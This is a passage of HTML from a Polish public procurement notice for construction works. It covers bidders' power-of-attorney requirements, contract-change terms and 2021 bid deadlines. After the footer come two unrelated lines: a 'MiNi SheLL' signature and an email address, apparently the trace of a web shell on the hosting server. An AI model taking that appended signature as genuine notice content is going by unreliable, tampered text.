wspólników<br/>spółkicywilnej;c)podmiotów„trzecich”, czyli podmiotów, na zasoby których powołuje się<br/>wykonawca wceluspełnienia warunków udziału w postępowaniu, o których mowa w punktach<br/>18.1. SWZorazprzesłanek wykluczenia z postępowania, o których mowa w art. 108 ust. 1 ustawy<br/>Pzp(punkt13.1. SWZ) oraz art. 109 ust. 1 ustawy Pzp punkty 5, 6, 7, 8, 9 i 10 (punkt 13.2.<br/>SWZ).3.Pełnomocnictwo (jeżeli dotyczy). Upoważnienie osób podpisujących ofertę<br/>musibezpośredniowynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli<br/>upoważnienietakie niewynika wprost z dokumentu stwierdzającego status prawny wykonawcy,<br/>to do ofertynależydołączyć stosowne pełnomocnictwo w formie oryginału lub<br/>kserokopiipotwierdzonej notarialnie,ustanowione do reprezentowania wykonawcy/ów<br/>ubiegającego/ych sięo udzielenie zamówieniapublicznego. W przypadku składania oferty<br/>wspólnej przezkilku przedsiębiorców(tzw.konsorcjum) wspólnicy muszą ustanowić<br/>pełnomocnikado reprezentowania ich wpostępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć<br/>stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli<br/>każdego ze wspólników <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian umowy został określony w załączniku nr 1 do SWZ, tj. we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-17 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-15</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com